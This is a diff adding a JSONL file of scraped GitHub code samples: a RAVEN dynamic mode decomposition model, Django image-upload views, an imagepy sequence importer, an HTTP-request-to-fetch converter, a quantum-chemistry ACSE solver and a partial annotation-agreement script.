diff --git "a/2332.jsonl" "b/2332.jsonl" new file mode 100644--- /dev/null +++ "b/2332.jsonl" @@ -0,0 +1,910 @@ +{"seq_id":"21359824939","text":"\nimport sys\nimport numpy as np\nfrom scipy import spatial\n#External Modules End--------------------------------------------------------------------------------\n\n#Internal Modules------------------------------------------------------------------------------------\nfrom ..utils import mathUtils\nfrom ..utils import InputData, InputTypes\nfrom ..SupervisedLearning import SupervisedLearning\n#Internal Modules End--------------------------------------------------------------------------------\n\n\nclass DMD(SupervisedLearning):\n \"\"\"\n This surrogate is aimed to construct a \"time-dep\" surrogate based on\n Dynamic Mode Decomposition method.\n Ref. Kutz, Brunton, Brunton, Proctor. Dynamic Mode Decomposition:\n Data-Driven Modeling of Complex Systems. SIAM Other Titles in\n Applied Mathematics, 2016\n \"\"\"\n info = {'problemtype':'regression', 'normalize':True}\n\n @classmethod\n def getInputSpecification(cls):\n \"\"\"\n Method to get a reference to a class that specifies the input data for\n class cls.\n @ In, cls, the class for which we are retrieving the specification\n @ Out, inputSpecification, InputData.ParameterInput, class to use for\n specifying input of cls.\n \"\"\"\n specs = super().getInputSpecification()\n specs.description = r\"\"\"The \\xmlString{DMD} ROM aimed to construct a time-dependent (or any other monotonic\n variable) surrogate model based on Dynamic Mode Decomposition\n This surrogate is aimed to perform a ``dimensionality reduction regression'', where, given time\n series (or any monotonic-dependent variable) of data, a set of modes each of which is associated\n with a fixed oscillation frequency and decay/growth rate is computed\n in order to represent the data-set.\n In order to use this Reduced Order Model, the \\xmlNode{ROM} attribute\n \\xmlAttr{subType} needs to be set equal to \\xmlString{DMD}.\n \\\\\n Once the ROM is trained (\\textbf{Step} \\xmlNode{RomTrainer}), its parameters/coefficients can be exported into an XML file\n via an \\xmlNode{OutStream} of type \\xmlAttr{Print}. The following variable/parameters can be exported (i.e. \\xmlNode{what} node\n in \\xmlNode{OutStream} of type \\xmlAttr{Print}):\n \\begin{itemize}\n \\item \\xmlNode{rankSVD}, see XML input specifications below\n \\item \\xmlNode{energyRankSVD}, see XML input specifications below\n \\item \\xmlNode{rankTLSQ}, see XML input specifications below\n \\item \\xmlNode{exactModes}, see XML input specifications below\n \\item \\xmlNode{optimized}, see XML input specifications below\n \\item \\xmlNode{features}, see XML input specifications below\n \\item \\xmlNode{timeScale}, XML node containing the array of the training time steps values\n \\item \\xmlNode{dmdTimeScale}, XML node containing the array of time scale in the DMD space (can be used as mapping\n between the \\xmlNode{timeScale} and \\xmlNode{dmdTimeScale})\n \\item \\xmlNode{eigs}, XML node containing the eigenvalues (imaginary and real part)\n \\item \\xmlNode{amplitudes}, XML node containing the amplitudes (imaginary and real part)\n \\item \\xmlNode{modes}, XML node containing the dynamic modes (imaginary and real part)\n \\end{itemize}\"\"\"\n specs.addSub(InputData.parameterInputFactory(\"dmdType\", contentType=InputTypes.makeEnumType(\"dmd\", \"dmdType\", [\"dmd\", \"hodmd\"]),\n descr=r\"\"\"the type of Dynamic Mode Decomposition to apply.Available are:\n \\begin{itemize}\n \\item \\textit{dmd}, for classical DMD\n \\item \\textit{hodmd}, for high order DMD.\n \\end{itemize}\"\"\", default=\"dmd\"))\n specs.addSub(InputData.parameterInputFactory(\"pivotParameter\", contentType=InputTypes.StringType,\n descr=r\"\"\"defines the pivot variable (e.g., time) that represents the\n independent monotonic variable\"\"\", default=\"time\"))\n specs.addSub(InputData.parameterInputFactory(\"rankSVD\", contentType=InputTypes.IntegerType,\n descr=r\"\"\"defines the truncation rank to be used for the SVD.\n Available options are:\n \\begin{itemize}\n \\item \\textit{-1}, no truncation is performed\n \\item \\textit{0}, optimal rank is internally computed\n \\item \\textit{>1}, this rank is going to be used for the truncation\n \\end{itemize}\"\"\", default=None))\n specs.addSub(InputData.parameterInputFactory(\"energyRankSVD\", contentType=InputTypes.FloatType,\n descr=r\"\"\"energy level ($0.0 < float < 1.0$) used to compute the rank such\n as computed rank is the number of the biggest singular values needed to reach the energy identified by\n \\xmlNode{energyRankSVD}. This node has always priority over \\xmlNode{rankSVD}\"\"\", default=None))\n specs.addSub(InputData.parameterInputFactory(\"rankTLSQ\", contentType=InputTypes.IntegerType,\n descr=r\"\"\"$int > 0$ that defines the truncation rank to be used for the total\n least square problem. If not inputted, no truncation is applied\"\"\", default=None))\n specs.addSub(InputData.parameterInputFactory(\"exactModes\", contentType=InputTypes.BoolType,\n descr=r\"\"\"True if the exact modes need to be computed (eigenvalues and\n eigenvectors), otherwise the projected ones (using the left-singular matrix after SVD).\"\"\", default=True))\n specs.addSub(InputData.parameterInputFactory(\"optimized\", contentType=InputTypes.FloatType,\n descr=r\"\"\"True if the amplitudes need to be computed minimizing the error\n between the modes and all the time-steps or False, if only the 1st timestep only needs to be considered\"\"\", default=False))\n return specs\n\n def __init__(self):\n \"\"\"\n DMD constructor\n @ In, None\n @ Out, None\n \"\"\"\n super().__init__()\n self.dmdParams = {} # dmd settings container\n self.printTag = 'DMD' # print tag\n self._dynamicHandling = True # This ROM is able to manage the time-series on its own. No need for special treatment outside\n self.pivotParameterID = None # pivot parameter\n # variables filled up in the training stages\n self._amplitudes = {} # {'target1': vector of amplitudes,'target2':vector of amplitudes, etc.}\n self._eigs = {} # {'target1': vector of eigenvalues,'target2':vector of eigenvalues, etc.}\n self._modes = {} # {'target1': matrix of dynamic modes,'target2':matrix of dynamic modes, etc.}\n self.__Atilde = {} # {'target1': matrix of lowrank operator from the SVD,'target2':matrix of lowrank operator from the SVD, etc.}\n self.pivotValues = None # pivot values (e.g. time)\n self.KDTreeFinder = None # kdtree weighting model\n self.timeScales = {} # time-scales (training and dmd). {'training' and 'dmd':{t0:float,'dt':float,'intervals':int}}\n self.featureVals = None # feature values\n\n def _handleInput(self, paramInput):\n \"\"\"\n Function to handle the common parts of the model parameter input.\n @ In, paramInput, InputData.ParameterInput, the already parsed input.\n @ Out, None\n \"\"\"\n super()._handleInput(paramInput)\n settings, notFound = paramInput.findNodesAndExtractValues(['pivotParameter','rankSVD', 'energyRankSVD',\n 'rankTLSQ','exactModes','optimized', 'dmdType'])\n # notFound must be empty\n assert(not notFound)\n self.pivotParameterID = settings.get(\"pivotParameter\",\"time\") # pivot parameter\n self.dmdParams['rankSVD' ] = settings.get('rankSVD',None) # -1 no truncation, 0 optimal rank is computed, >1 truncation rank\n self.dmdParams['energyRankSVD' ] = settings.get('energyRankSVD',None) # 0.0 < float < 1.0, computed rank is the number of the biggest sv needed to reach the energy identified by \"energyRankSVD\"\n self.dmdParams['rankTLSQ' ] = settings.get('rankTLSQ',None) # truncation rank for total least square\n self.dmdParams['exactModes' ] = settings.get('exactModes',True) # True if the exact modes need to be computed (eigs and eigvs), otherwise the projected ones (using the left-singular matrix)\n self.dmdParams['optimized' ] = settings.get('optimized',False) # amplitudes computed minimizing the error between the mods and all the timesteps (True) or 1st timestep only (False)\n self.dmdParams['dmdType' ] = settings.get('dmdType','dmd') # the dmd type to be applied. Currently we support dmd and hdmd (high order dmd)\n\n # some checks\n if self.dmdParams['rankSVD'] is not None and self.dmdParams['energyRankSVD'] is not None:\n self.raiseAWarning('Both \"rankSVD\" and \"energyRankSVD\" have been inputted. \"energyRankSVD\" is predominant and will be used!')\n # check if the pivotParameter is among the targetValues\n if self.pivotParameterID not in self.target:\n self.raiseAnError(IOError,\"The pivotParameter \"+self.pivotParameterID+\" must be part of the Target space!\")\n if len(self.target) < 2:\n self.raiseAnError(IOError,\"At least one Target in addition to the pivotParameter \"+self.pivotParameterID+\" must be part of the Target space!\")\n\n def __setstate__(self,state):\n \"\"\"\n Initializes the DMD with the data contained in state\n @ In, state, dict, it contains all the information needed by the ROM to be initialized\n @ Out, None\n \"\"\"\n self.__dict__.update(state)\n self.KDTreeFinder = spatial.KDTree(self.featureVals)\n\n def _localNormalizeData(self,values,names,feat):\n \"\"\"\n Overwrites default normalization procedure.\n @ In, values, unused\n @ In, names, unused\n @ In, feat, feature to normalize\n @ Out, None\n \"\"\"\n self.muAndSigmaFeatures[feat] = (0.0,1.0)\n\n #######\n def _getTimeScale(self,dmd=True):\n \"\"\"\n Get the ts of the dmd (if dmd = True) or training (if dmd = False) reconstructed time scale.\n @ In, dmd, bool, optional, True if dmd time scale needs to be returned, othewise training one\n @ Out, timeScale, numpy.array, the dmd or training reconstructed time scale\n \"\"\"\n timeScaleInfo = self.timeScales['dmd'] if dmd else self.timeScales['training']\n timeScale = np.arange(timeScaleInfo['t0'], (timeScaleInfo['intervals']+1)*timeScaleInfo['dt'], timeScaleInfo['dt'])\n return timeScale\n\n def __getTimeEvolution(self, target):\n \"\"\"\n Get the time evolution of each mode\n @ In, target, str, the target for which mode evolution needs to be retrieved for\n @ Out, timeEvol, numpy.ndarray, the matrix that contains all the time evolution (by row)\n \"\"\"\n omega = np.log(self._eigs[target]) / self.timeScales['training']['dt']\n van = np.exp(np.multiply(*np.meshgrid(omega, self._getTimeScale())))\n timeEvol = (van * self._amplitudes[target]).T\n return timeEvol\n\n def _reconstructData(self, target):\n \"\"\"\n Retrieve the reconstructed data\n @ In, target, str, the target for which the data needs to be reconstructed\n @ Out, data, numpy.ndarray, the matrix (nsamples,n_time_steps) containing the reconstructed data\n \"\"\"\n data = self._modes[target].dot(self.__getTimeEvolution(target))\n return data\n\n def _train(self,featureVals,targetVals):\n \"\"\"\n Perform training on input database stored in featureVals.\n @ In, featureVals, numpy.ndarray, shape=[n_timeStep, n_dimensions], an array of input data # Not use for ARMA training\n @ In, targetVals, numpy.ndarray, shape = [n_timeStep, n_dimensions], an array of time series data\n \"\"\"\n self.featureVals = featureVals\n self.KDTreeFinder = spatial.KDTree(featureVals)\n pivotParamIndex = self.target.index(self.pivotParameterID)\n self.pivotValues = targetVals[0,:,pivotParamIndex]\n ts = len(self.pivotValues)\n for target in list(set(self.target) - set([self.pivotParameterID])):\n targetParamIndex = self.target.index(target)\n snaps = targetVals[:,:,targetParamIndex]\n # if number of features (i.e. samples) > number of snapshots, we apply the high order DMD or HODMD has been requested\n imposedHODMD = False\n if self.dmdParams['dmdType'] == 'hodmd' or snaps.shape[0] < snaps.shape[1]:\n v = max(snaps.shape[1] - snaps.shape[0],2)\n imposedHODMD = True\n snaps = np.concatenate([snaps[:, i:snaps.shape[1] - v + i + 1] for i in range(v) ], axis=0)\n # overlap snaps\n X, Y = snaps[:, :-1], snaps[:, 1:]\n if self.dmdParams['rankTLSQ'] is not None:\n X, Y = mathUtils.computeTruncatedTotalLeastSquare(X, Y, self.dmdParams['rankTLSQ'])\n rank = self.dmdParams['energyRankSVD'] if self.dmdParams['energyRankSVD'] is not None else (self.dmdParams['rankSVD'] if self.dmdParams['rankSVD'] is not None else -1)\n U, s, V = mathUtils.computeTruncatedSingularValueDecomposition(X, rank)\n # lowrank operator from the SVD of matrices X and Y\n self.__Atilde[target] = U.T.conj().dot(Y).dot(V) * np.reciprocal(s)\n self._eigs[target], self._modes[target] = mathUtils.computeEigenvaluesAndVectorsFromLowRankOperator(self.__Atilde[target],\n Y, U, s, V,\n self.dmdParams['exactModes'])\n if imposedHODMD:\n self._modes[target] = self._modes[target][:targetVals[:,:,targetParamIndex].shape[0],:]\n self._amplitudes[target] = mathUtils.computeAmplitudeCoefficients(self._modes[target],\n targetVals[:,:,targetParamIndex],\n self._eigs[target],\n self.dmdParams['optimized'])\n # Default timesteps (even if the time history is not equally spaced in time, we \"trick\" the dmd to think it).\n self.timeScales = dict.fromkeys( ['training','dmd'],{'t0': 0, 'intervals': ts - 1, 'dt': 1})\n\n def __evaluateLocal__(self,featureVals):\n \"\"\"\n This method is used to inquire the DMD to evaluate (after normalization that in\n this case is not performed) a set of points contained in featureVals.\n a KDTree algorithm is used to construct a weighting function for the reconstructed space\n @ In, featureVals, numpy.ndarray, shape= (n_requests, n_dimensions), an array of input data\n @ Out, returnEvaluation , dict, dictionary of values for each target (and pivot parameter)\n \"\"\"\n returnEvaluation = {self.pivotParameterID:self.pivotValues}\n for target in list(set(self.target) - set([self.pivotParameterID])):\n reconstructData = self._reconstructData(target).real\n # find the nearest data and compute weights\n if len(reconstructData) > 1:\n weights, indexes = self.KDTreeFinder.query(featureVals, k=min(2**len(self.features),len(reconstructData)))\n # if 0 (perfect match), assign minimum possible distance\n weights[weights == 0] = sys.float_info.min\n weights =1./weights\n # normalize to 1\n weights = weights/weights.sum()\n for point in range(len(weights)):\n returnEvaluation[target] = np.sum ((weights[point,:]*reconstructData[indexes[point,:]].T) , axis=1)\n else:\n returnEvaluation[target] = reconstructData[0]\n\n return returnEvaluation\n\n def writeXMLPreamble(self, writeTo, targets = None):\n \"\"\"\n Specific local method for printing anything desired to xml file at the begin of the print.\n @ In, writeTo, xmlUtils.StaticXmlElement instance, element to write to\n @ In, targets, list, list of targets for whom information should be written.\n @ Out, None\n \"\"\"\n # add description\n super().writeXMLPreamble(writeTo, targets)\n description = ' This XML file contains the main information of the DMD ROM.'\n description += ' If \"modes\" (dynamic modes), \"eigs\" (eigenvalues), \"amplitudes\" (mode amplitudes)'\n description += ' and \"dmdTimeScale\" (internal dmd time scale) are dumped, the method'\n description += ' is explained in P.J. Schmid, Dynamic mode decomposition'\n description += ' of numerical and experimental data, Journal of Fluid Mechanics 656.1 (2010), 5-28'\n writeTo.addScalar('ROM',\"description\",description)\n\n def writeXML(self, writeTo, targets = None, skip = None):\n \"\"\"\n Adds requested entries to XML node.\n @ In, writeTo, xmlTuils.StaticXmlElement, element to write to\n @ In, targets, list, optional, list of targets for whom information should be written\n @ In, skip, list, optional, list of targets to skip\n @ Out, None\n \"\"\"\n if not self.amITrained:\n self.raiseAnError(RuntimeError,'ROM is not yet trained!')\n if skip is None:\n skip = []\n\n # check what\n what = ['exactModes','optimized','dmdType','features','timeScale','eigs','amplitudes','modes','dmdTimeScale']\n if self.dmdParams['rankTLSQ'] is not None:\n what.append('rankTLSQ')\n what.append('energyRankSVD' if self.dmdParams['energyRankSVD'] is not None else 'rankSVD')\n if targets is None:\n readWhat = what\n else:\n readWhat = targets\n for s in skip:\n if s in readWhat:\n readWhat.remove(s)\n if not set(readWhat) <= set(what):\n self.raiseAnError(IOError, \"The following variables specified in node are not recognized: \"+ \",\".join(np.setdiff1d(readWhat, what).tolist()) )\n else:\n what = readWhat\n\n target = self.target[-1]\n toAdd = ['exactModes','optimized','dmdType']\n if self.dmdParams['rankTLSQ'] is not None:\n toAdd.append('rankTLSQ')\n toAdd.append('energyRankSVD' if self.dmdParams['energyRankSVD'] is not None else 'rankSVD')\n self.dmdParams['rankSVD'] = self.dmdParams['rankSVD'] if self.dmdParams['rankSVD'] is not None else -1\n\n for add in toAdd:\n if add in what :\n writeTo.addScalar(target,add,self.dmdParams[add])\n targNode = writeTo._findTarget(writeTo.getRoot(), target)\n if \"features\" in what:\n writeTo.addScalar(target,\"features\",' '.join(self.features))\n if \"timeScale\" in what:\n writeTo.addScalar(target,\"timeScale\",' '.join(['%.6e' % elm for elm in self.pivotValues.ravel()]))\n if \"dmdTimeScale\" in what:\n writeTo.addScalar(target,\"dmdTimeScale\",' '.join(['%.6e' % elm for elm in self._getTimeScale()]))\n if \"eigs\" in what:\n eigsReal = \" \".join(['%.6e' % self._eigs[target][indx].real for indx in\n range(len(self._eigs[target]))])\n writeTo.addScalar(\"eigs\",\"real\", eigsReal, root=targNode)\n eigsImag = \" \".join(['%.6e' % self._eigs[target][indx].imag for indx in\n range(len(self._eigs[target]))])\n writeTo.addScalar(\"eigs\",\"imaginary\", eigsImag, root=targNode)\n if \"amplitudes\" in what:\n ampsReal = \" \".join(['%.6e' % self._amplitudes[target][indx].real for indx in\n range(len(self._amplitudes[target]))])\n writeTo.addScalar(\"amplitudes\",\"real\", ampsReal, root=targNode)\n ampsImag = \" \".join(['%.6e' % self._amplitudes[target][indx].imag for indx in\n range(len(self._amplitudes[target]))])\n writeTo.addScalar(\"amplitudes\",\"imaginary\", ampsImag, root=targNode)\n if \"modes\" in what:\n for smp in range(len(self._modes[target])):\n valDict = {'real': ' '.join([ '%.6e' % elm for elm in self._modes[target][smp,:].real]),\n 'imaginary':' '.join([ '%.6e' % elm for elm in self._modes[target][smp,:].imag])}\n attributeDict = {self.features[index]:'%.6e' % self.featureVals[smp,index] for index in range(len(self.features))}\n writeTo.addVector(\"modes\",\"realization\",valDict, root=targNode, attrs=attributeDict)\n\n def __confidenceLocal__(self,featureVals):\n \"\"\"\n The confidence associate with a set of requested evaluations\n @ In, featureVals, numpy.ndarray, shape= (n_requests, n_dimensions), an array of input data\n @ Out, None\n \"\"\"\n pass\n\n def __resetLocal__(self,featureVals):\n \"\"\"\n After this method the ROM should be described only by the initial parameter settings\n @ In, featureVals, numpy.ndarray, shape= (n_samples, n_dimensions), an array of input data (training data)\n @ Out, None\n \"\"\"\n self.amITrained = False\n self._amplitudes = {}\n self._eigs = {}\n self._modes = {}\n self.__Atilde = {}\n self.pivotValues = None\n self.KDTreeFinder = None\n self.featureVals = None\n\n def __returnInitialParametersLocal__(self):\n \"\"\"\n This method returns the initial parameters of the SM\n @ In, None\n @ Out, self.dmdParams, dict, the dict of the SM settings\n \"\"\"\n return self.dmdParams\n\n def __returnCurrentSettingLocal__(self):\n \"\"\"\n This method is used to pass the set of parameters of the ROM that can change during simulation\n @ In, None\n @ Out, self.dmdParams, dict, the dict of the SM settings\n \"\"\"\n return self.dmdParams\n","repo_name":"idaholab/raven","sub_path":"ravenframework/SupervisedLearning/DynamicModeDecomposition.py","file_name":"DynamicModeDecomposition.py","file_ext":"py","file_size_in_byte":22051,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"38"} +{"seq_id":"16494946489","text":"# Create your views here.\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom django.shortcuts import render_to_response\r\nfrom django.template.context import RequestContext\r\nfrom django.http import HttpResponseRedirect , HttpResponse\r\nimport Image , os\r\nfrom picture import settings\r\nimport ImageFile\r\n\r\n# this is for uploading picture\r\n@csrf_exempt\r\ndef load_image(request):\r\n return render_to_response('load_image.html' , context_instance=RequestContext(request))\r\n\r\ndef change_picture_size(pic_path):\r\n change_width = 200\r\n change_height = 300\r\n pic_path = pic_path.replace('\\\\' , '/')\r\n pic_img = Image.open(pic_path)\r\n pic_img = pic_img.resize((change_width , change_height) , Image.ANTIALIAS)\r\n new_pic_path = os.path.join(settings.Img_dir , \"resize_pic.jpg\")\r\n pic_img.save(new_pic_path)\r\n return 0\r\n\r\n@csrf_exempt\r\ndef upload(request):\r\n f = request.FILES\r\n if f.get('docfile') is not None:\r\n fi = f.get('docfile')\r\n parser = ImageFile.Parser()\r\n for chunk in fi.chunks(): \r\n parser.feed(chunk) \r\n img = parser.close()\r\n name = os.path.join(settings.Img_dir, 'liu.jpg')\r\n img.save(name)\r\n change_picture_size(name)\r\n return render_to_response('load_image.html' , context_instance=RequestContext(request))\r\n else:\r\n return HttpResponseRedirect(\"/load_image/\")\r\n\r\n@csrf_exempt\r\ndef process_picture(request):\r\n pic_name = os.path.join(settings.Img_dir , \"liu.jpg\")\r\n new_width = 200\r\n new_height = 300\r\n pic_img = Image.open(pic_name)\r\n pic_img = pic_img.resize((new_width , new_height) , Image.ANTIALIAS)\r\n new_liu_path = pic_name.replace(\"liu\" , \"new_liu\")\r\n pic_img.save(new_liu_path)\r\n return HttpResponse(\"load\")\r\n\r\n@csrf_exempt\r\ndef gray_process(request):\r\n pic_name = os.path.join(settings.Img_dir , \"new_liu.jpg\")\r\n gray_pic = os.path.join(settings.Img_dir , \"gray_picture.jpg\")\r\n if os.path.exists(pic_name):\r\n pic_img = Image.open(pic_name)\r\n gray_img = pic_img.convert('L')\r\n gray_img.save(gray_pic)\r\n ret = \"gray_picture\"\r\n else:\r\n ret = \"not_gray_picture\"\r\n return HttpResponse(ret)\r\n\r\n \r\n","repo_name":"waytai/processpicture","sub_path":"loadpicture/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71225522991","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 15 14:42:55 2016\n@author: yxl\n\"\"\"\n\nfrom sciapp.action import dataio\nfrom skimage.io import imread\nfrom sciapp.action import Free\nfrom glob import glob\nimport os.path as osp\n \nclass Plugin(Free):\n title = 'Import Sequence'\n para = {'path':'', 'start':0, 'end':0, 'step':1, 'title':'sequence'}\n\n def load(self):\n self.filt = dataio.ReaderManager.names()\n return True\n\n def show(self):\n filt = '|'.join(['%s files (*.%s)|*.%s'%(i.upper(),i,i) for i in self.filt])\n rst = self.app.get_path('Import sequence', self.filt, 'open')\n if rst is None: return rst\n self.para['path'] = rst\n files = self.getfiles(self.para['path'])\n nfs = len(files)\n self.para['end'] = nfs-1\n self.view = [(str, 'title', 'Title',''), \n (int, 'start', (0, nfs-1), 0, 'Start', '0~{}'.format(nfs-1)),\n (int, 'end', (0, nfs-1), 0, 'End', '0~{}'.format(nfs-1)),\n (int, 'step', (0, nfs-1), 0, 'Step', '')]\n return self.app.show_para('Import sequence', self.para, self.view)\n\n def getfiles(self, name):\n p,f = osp.split(name)\n s = p+'/*.'+name.split('.')[-1]\n return glob(s)\n\n def readimgs(self, names, read, shape, dtype):\n imgs = []\n for i in range(len(names)):\n self.progress(i, len(names))\n img = read(names[i])\n if img.shape!=shape or img.dtype!=dtype:\n print('error:', names[i])\n continue\n imgs.append(img)\n return imgs\n\n #process\n def run(self, para = None):\n fp, fn = osp.split(para['path'])\n fn, fe = osp.splitext(fn)\n read = dataio.ReaderManager.get(name=fe[1:])\n try: img = read(para['path'])\n except: return self.app.alert('unknown img format!')\n files = self.getfiles(para['path'])\n files.sort()\n imgs = self.readimgs(files[para['start']:para['end']+1:para['step']], \n read, img.shape, img.dtype)\n self.app.show('imgs', imgs, para['title'])\n\nif __name__ == '__main__':\n print(Plugin.title)\n app = wx.App(False)\n Plugin().run()","repo_name":"Image-Py/imagepy","sub_path":"imagepy/menus/File/Import/sequence_plg.py","file_name":"sequence_plg.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":1265,"dataset":"github-code","pt":"38"} +{"seq_id":"33479775801","text":"import json\n\nclass BaseRequestFormatter:\n def format_request(self, request, protocol, host, port_suffix):\n raise NotImplementedError(\"Subclasses must implement this method\")\n\nclass FetchRequestFormatter(BaseRequestFormatter):\n def format_request(self, request, protocol, host, port_suffix):\n try:\n # Split the request into headers and body\n http_request = request.split(\"\\r\\n\\r\\n\", 1)\n headers_lines, body = http_request[0].split(\"\\r\\n\", 1), http_request[1]\n \n headers_lines = [x.encode('UTF8') for x in headers_lines]\n request_line, header_lines = headers_lines[0], headers_lines[1:]\n header_lines = header_lines[0].split(\"\\r\\n\")\n \n # Extract the request method and URL path\n method, url_path, _ = request_line.split(\" \")\n full_url = \"{protocol}://{host}{port_suffix}{url_path}\".format(protocol=protocol, host=host, port_suffix=port_suffix, url_path=url_path)\n full_url = full_url.replace('\\'', '\\\\\\'')\n \n \n # Extract the headers from the request\n headers = {}\n for header_line in header_lines:\n header_parts = header_line.split(\":\")\n print(header_parts)\n header_name = header_parts[0].strip()\n header_value = ':'.join(header_parts[1:]).strip()\n headers[header_name] = header_value\n\n # Generate the Fetch API call with appropriate headers and body\n fetch_headers = json.dumps(headers, indent=4)\n fetch_body = json.dumps(body)\n \n # Do not include request \"body\" if method is GET or HEAD\n if method == \"GET\" or method == \"HEAD\":\n fetch_code = \"\"\"fetch('{url}', {{\n method: '{method}',\n headers: {fetch_headers},\n }})\n .then(response => response.text())\n .then(data => console.log(data))\n .catch(error => console.error('Error:', error));\n \"\"\".format(url=full_url, method=method, fetch_headers=fetch_headers)\n else:\n fetch_code = \"\"\"fetch('{url}', {{\n method: '{method}',\n headers: {fetch_headers},\n body: {fetch_body}\n }})\n .then(response => response.text())\n .then(data => console.log(data))\n .catch(error => console.error('Error:', error));\n \"\"\".format(url=url, method=method, fetch_headers=fetch_headers, fetch_body=fetch_body)\n \n except Exception as e:\n print(\"Error occurred while converting the request to Fetch: {}\".format(e))\n fetch_code = \"Error: Could not convert the request to Fetch\"\n \n print(fetch_code)\n return fetch_code\n\n\nclass Python3RequestFormatter(BaseRequestFormatter):\n def format_request(self, request, protocol, host, port_suffix):\n # Logic to convert request to Python 3 format\n # ...\n python3_code = \"TODO\"\n return python3_code\n","repo_name":"C-960/HTTP-Request-Converter","sub_path":"request_formatters.py","file_name":"request_formatters.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"72857276912","text":"import numpy as np\nimport sys \nnp.set_printoptions(linewidth=200,suppress=False,precision=3)\nfrom hqca.tools import *\nfrom hqca.operators import *\nfrom functools import reduce\nfrom hqca.core import *\nfrom copy import deepcopy as copy\nimport timeit\nfrom hqca.processes import StandardProcess\nfrom hqca.tomography import StandardTomography\n\n\n\n\ndef solvecACSE(\n acse,\n operator=None,\n S_min=1e-10,\n tomo=None,\n verbose=True,\n transform=None,\n matrix=False,\n norm='fro',\n **kw,\n ):\n '''\n Solve the ACSE, which traditionally has elements defined as:\n A^ik_jl = < [a_i+ a_k+ a_l a_j ,H] >\n\n Here, we instead let the residuals of A represent the gradient direciton,\n which properly is given as <[H,i+ k+ l j ]>\n\n Note that Eulers method adds a minus sign appropriately\n\n '''\n store = acse.store\n alp = store.alpha_mo['qubit']\n bet = store.beta_mo['qubit']\n if store.Ne_as<3 and tomo.p==2:\n D3 = RDM(\n order=3,\n alpha=alp,\n beta = bet,\n rdm = None,\n Ne=acse.store.No_as)\n #\n circ = acse._generate_circuit(\n op=operator,\n tomo=tomo,\n order=2,\n compact=False)\n D2 = circ.rdm\n elif tomo.p==3:\n circ = acse._generate_circuit(\n op=operator,\n tomo=tomo,\n order=3,\n compact=False)\n D3 = circ.rdm\n D2 = D3.reduce_order()\n else:\n raise ResidualError\n if verbose:\n print('-- -- -- -- -- -- -- -- -- -- --')\n print('classical ACSE')\n print('-- -- -- -- -- -- -- -- -- -- --')\n print('trace of the 3-RDM: {}'.format(D3.trace()))\n print('')\n keys = acse.rdme\n D2 = np.real(D2.rdm)\n D3 = np.real(D3.rdm)\n Na = len(alp)\n No = 2*Na\n S = []\n tS = []\n new = Operator()\n newF= Operator()\n max_val=0\n # \n #\n A = np.zeros((No,No,No,No),dtype=np.complex_)\n #K1 = store.H.ints_1e\n #K2 = store.H.ints_2e\n #W = K2 - K2.transpose(0,1,3,2)\n W = (store.H.K2 - store.H.K2.transpose(0,1,3,2))\n so = alp+bet\n for i in so:\n for j in so:\n for k in so:\n for l in so:\n A[i,k,j,l]-= np.dot(D2[:,:,j,l],W[:,:,i,k].T).trace()\n A[i,k,j,l]+= np.dot(D2[:,:,i,k],W[:,:,j,l].T).trace()\n for r in so:\n A[i,k,j,l]+= np.dot(D3[:,r,k,j,l,:],W[:,r,i,:].T).trace()\n A[i,k,j,l]-= np.dot(D3[:,r,i,j,l,:],W[:,r,k,:].T).trace()\n A[i,k,j,l]-= np.dot(D3[i,k,:,r,:,j],W[:,l,r,:].T).trace()\n A[i,k,j,l]+= np.dot(D3[i,k,:,r,:,l],W[:,j,r,:].T).trace()\n if matrix:\n newA = np.zeros(1*len(keys))\n for n,inds in enumerate(keys):\n i,k,l,j = inds[0],inds[1],inds[2],inds[3]\n newA[n]=A[i,k,l,j]\n #newA[n+len(keys)]=A[i,k,l,j]\n #newA[n+2*len(keys)]=A[i,k,l,j]\n #newA[n+3*len(keys)]=A[i,k,l,j]\n return -newA\n else:\n nz = np.nonzero(A)\n new = Operator()\n norm = 0\n for i,k,j,l in zip(nz[0],nz[1],nz[2],nz[3]):\n term = A[i,k,j,l]\n if abs(term)>=S_min:\n new+= FermiString(\n coeff=-term,\n indices=[i,k,l,j],\n ops='++--',\n N = acse.qs.dim,\n )\n norm+= np.real(np.conj(term)*term)\n\n assert (np.sqrt(norm)-np.linalg.norm(A))<1e-8\n return new,0.5*np.linalg.norm(A)\n\n\n\n","repo_name":"damazz/HQCA","sub_path":"hqca/acse/_class_A_acse.py","file_name":"_class_A_acse.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"5521871427","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport argparse\nimport logging\nimport sys\nimport pandas\n\nimport numpy as np\nfrom pandas_confusion import ConfusionMatrix\n\nfrom common import NODES\n\nLANGCODES = (\"Romanian\",\"ro\"), (\"Polish\", \"pl\"), (\"German\", \"de\"), (\"Czech\", \"cs\")\n\ndef get_kappa(cm):\n # The pandas_confusion kappa implementation crashes on some platforms,\n # so I reimplement it here.\n df = cm.to_dataframe()\n N = df.sum().sum()\n #print(N)\n sum_diag = np.trace(df)\n #print(sum_diag)\n sum_row = df.sum(axis=0)\n sum_col = df.sum(axis=1)\n p_e = float(sum(sum_row*sum_col)) / (N*N)\n print(\"normalised sum_row x sum_col\")\n print(((sum_row*sum_col) / (N*N)))\n #print(sum_row)\n #print(sum_col)\n #print (p_e)\n p_o = float(sum_diag) / N\n #print(p_o)\n kappa = (p_o - p_e) / (1 - p_e)\n return kappa,p_o,p_e\n\ndef print_overall_stats(by_lang,args):\n print(\"Counts of doubly annotated nodes\") \n node_count = len(by_lang)\n sentence_count = len(by_lang['sent_id'].value_counts())\n print(\"Sentence count: {}; Node count: {}\".format(sentence_count, node_count))\n\ndef print_overall_iaa(by_lang, lang, args):\n groups = ((\"A\", \"B\", \"R\", \"O\", \"G\"),)\n if args.separate_label_groups:\n groups = ((\"A\", \"B\"), (\"R\", \"O\", \"G\"), (\"R\", \"G\"),(\"A\", \"B\",\"R\", 